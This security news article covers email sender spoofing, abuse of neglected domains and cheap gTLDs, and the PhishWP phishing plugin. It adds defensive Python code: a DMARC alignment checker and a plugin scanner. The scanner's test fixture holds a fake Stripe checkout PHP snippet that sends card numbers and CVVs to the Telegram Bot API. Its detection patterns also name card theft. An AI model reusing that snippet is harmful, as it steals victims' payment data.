Cybersecurity Threats: Spoofing Sender Email Addresses and Exploiting Neglected Domains
Cybersecurity researchers have identified a growing trend of malicious actors successfully spoofing sender email addresses as part of various malspam campaigns.
Faking the sender address of an email is widely seen as an attempt to make the digital message more legitimate and evade security mechanisms that could otherwise flag it as malicious.
Despite safeguards such as DomainKeys Identified Mail (DKIM), Domain-based Message Authentication, Reporting and Conformance (DMARC), and Sender Policy Framework (SPF), which can prevent spammers from spoofing well-known domains, these measures have increasingly pushed attackers to leverage old, neglected domains in their operations instead.
In doing so, the email messages are likely to bypass security checks that rely on domain age as a means to identify spam.
Neglected, long-registered domains have thus become a significant concern, with malicious actors exploiting them to slip past domain-age checks.
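The following is an added example, not code from the article or any of the vendors it cites. It shows the receiver side of the two points above: how a DMARC record turns SPF/DKIM results into a disposition by requiring the authenticated domain to align with the visible From domain (so a spoofed From on a domain with `p=reject` is rejected even though SPF passed for the attacker's own envelope domain), and why a domain-age check alone is not enough, since an old but dormant domain passes it. The public-suffix set, domain names, dates and DMARC records are constructed for the demo; real receivers use the full Public Suffix List and their own sending-history data.

```python
"""Added example (not from the original article): minimal DMARC alignment
check plus a neglected-domain heuristic. All sample data is constructed."""
from dataclasses import dataclass
from datetime import date
from typing import Optional

# Constructed stand-in for the Public Suffix List (assumption for the demo).
PUBLIC_SUFFIXES = {"com", "net", "org", "co.uk"}


def org_domain(fqdn: str) -> str:
    """Organizational domain for relaxed alignment: mail.example.com -> example.com."""
    labels = fqdn.lower().rstrip(".").split(".")
    for n in (2, 1):  # try two-label suffixes (co.uk) before one-label ones
        if len(labels) > n and ".".join(labels[-n:]) in PUBLIC_SUFFIXES:
            return ".".join(labels[-(n + 1):])
    return fqdn.lower()


def parse_dmarc(record: str) -> dict:
    """Parse 'v=DMARC1; p=reject; adkim=s' into a dict with RFC 7489 defaults."""
    tags = {"p": "none", "adkim": "r", "aspf": "r"}
    for part in record.split(";"):
        if "=" in part:
            key, value = part.strip().split("=", 1)
            tags[key.strip().lower()] = value.strip().lower()
    return tags


def aligned(from_domain: str, auth_domain: str, mode: str) -> bool:
    """Strict mode needs an exact match; relaxed mode compares organizational domains."""
    if not auth_domain:
        return False
    if mode == "s":
        return from_domain.lower() == auth_domain.lower()
    return org_domain(from_domain) == org_domain(auth_domain)


@dataclass
class AuthResults:
    from_domain: str     # domain in the RFC5322.From header the user sees
    spf_result: str      # "pass" / "fail" / "none"
    spf_domain: str      # envelope (MAIL FROM) domain SPF was evaluated for
    dkim_result: str
    dkim_domain: str     # d= tag of the DKIM signature, "" if unsigned


def dmarc_disposition(r: AuthResults, record: Optional[str]) -> str:
    """Return 'pass', or the policy action ('none'/'quarantine'/'reject') on failure."""
    if record is None:
        return "no-policy"  # nothing stops spoofing of a domain that publishes no DMARC
    tags = parse_dmarc(record)
    spf_ok = r.spf_result == "pass" and aligned(r.from_domain, r.spf_domain, tags["aspf"])
    dkim_ok = r.dkim_result == "pass" and aligned(r.from_domain, r.dkim_domain, tags["adkim"])
    return "pass" if (spf_ok or dkim_ok) else tags["p"]


def neglected_domain_risk(registered: str, first_seen_sending: Optional[str],
                          today: str, dormant_years: int = 5) -> str:
    """Domain-age checks alone wave old domains through; flag old-but-dormant senders.
    Dates are ISO strings; first_seen_sending is None when the domain has no mail history."""
    reg, now = date.fromisoformat(registered), date.fromisoformat(today)
    age_days = (now - reg).days
    if age_days < 30:
        return "new-domain"
    if first_seen_sending is None or (now - date.fromisoformat(first_seen_sending)).days < 30:
        return "old-but-dormant" if age_days > dormant_years * 365 else "recent-sender"
    return "established-sender"


if __name__ == "__main__":
    spoof = AuthResults("example.com", "pass", "attacker.invalid", "none", "")
    print(dmarc_disposition(spoof, "v=DMARC1; p=reject"))            # reject
    print(dmarc_disposition(spoof, None))                              # no-policy
    print(neglected_domain_risk("2010-01-01", None, "2025-01-07"))     # old-but-dormant
```

The `no-policy` branch is the practical takeaway: an old domain whose owner never published DMARC gives attackers both a clean reputation and no alignment check, so receivers that only score on domain age need a sending-history signal like the one in `neglected_domain_risk`.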
The development comes as generic top-level domains (gTLDs) such as .top, .xyz, .shop, .vip, and .club have accounted for 37% of cybercrime domains reported between September 2023 and August 2024, despite holding only 11% of the total domain name market, according to a report from the Interisle Consulting Group.
These domains have become lucrative for malicious actors due to low prices and a lack of registration requirements, thereby opening doors for abuse. Among the gTLDs widely used for cybercrime, 22 offered registration fees of less than $2.00.
Threat actors have also been discovered advertising a malicious WordPress plugin called PhishWP that can be used to create customizable payment pages mimicking legitimate payment processors like Stripe to steal personal and financial data via Telegram.
“Attackers can either compromise legitimate WordPress websites or set up fraudulent ones to install it,” SlashNext said in a new report. “After configuring the plugin to mimic a payment gateway, unsuspecting users are lured into entering their payment details. The plugin collects this information and sends it directly to attackers, often in real-time.”
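As an added example (not code from the article, SlashNext or PhishWP itself), the scan below shows how a site owner can triage installed WordPress plugins for the combination SlashNext describes: a form that collects payment-card fields together with code that posts to Telegram. The plugin sources are constructed for the demo, and the indicator patterns (card field names, the Telegram Bot API host, WordPress HTTP helpers, payment-brand strings) are generic assumptions rather than signatures of the real plugin.

```python
"""Added example (not from the original article): indicator scan for
WordPress plugin source. Sample plugin sources are constructed."""
import re

# Generic indicators (assumptions for the demo, not PhishWP signatures).
CARD_FIELDS = re.compile(
    r'name\s*=\s*["\'](card[_-]?number|cvv|cvc|exp(?:iry|_month|_year)?)["\']', re.I)
TELEGRAM_API = re.compile(r"api\.telegram\.org/bot", re.I)
OUTBOUND_CALL = re.compile(r"\b(wp_remote_post|wp_remote_get|curl_exec|file_get_contents)\s*\(", re.I)
BRAND_MIMIC = re.compile(r"\b(stripe|paypal|checkout)\b", re.I)


def scan_plugin_source(source: str) -> dict:
    """Return per-indicator hits and a verdict for one plugin file's source text."""
    findings = {
        "card_fields": bool(CARD_FIELDS.search(source)),
        "telegram_api": bool(TELEGRAM_API.search(source)),
        "outbound_call": bool(OUTBOUND_CALL.search(source)),
        "brand_strings": bool(BRAND_MIMIC.search(source)),
    }
    # Card collection plus Telegram exfiltration is the pattern the report describes;
    # other combinations only warrant a manual review.
    if findings["card_fields"] and findings["telegram_api"]:
        findings["verdict"] = "likely-phishing-kit"
    elif sum(findings.values()) >= 2:
        findings["verdict"] = "review"
    else:
        findings["verdict"] = "clean"
    return findings


# Constructed benign plugin: a contact form that posts to its own backend.
BENIGN_PLUGIN = """<?php
/* Plugin Name: Demo Contact Form */
echo '<form><input name="email"><input name="message"></form>';
wp_remote_post("https://backend.example.invalid/api/contact", array("body" => $_POST));
"""

# Constructed malicious plugin shaped like the report's description.
SUSPECT_PLUGIN = """<?php
/* Plugin Name: Stripe Checkout Gateway (fake) */
echo '<form><input name="card_number"><input name="expiry"><input name="cvv"></form>';
$msg = urlencode(json_encode($_POST));
wp_remote_get("https://api.telegram.org/bot" . $token . "/sendMessage?chat_id=" . $chat . "&text=" . $msg);
"""


def scan_all(plugins: dict) -> dict:
    """Scan a {plugin_name: source} mapping and return {plugin_name: verdict}."""
    return {name: scan_plugin_source(src)["verdict"] for name, src in plugins.items()}


if __name__ == "__main__":
    for name, verdict in scan_all({"demo-contact": BENIGN_PLUGIN, "fake-gateway": SUSPECT_PLUGIN}).items():
        print(f"{name}: {verdict}")
```

String matching like this is only a first pass: a kit can obfuscate the host name, so the scan is best paired with egress logging that shows which plugins make outbound HTTP requests and where to.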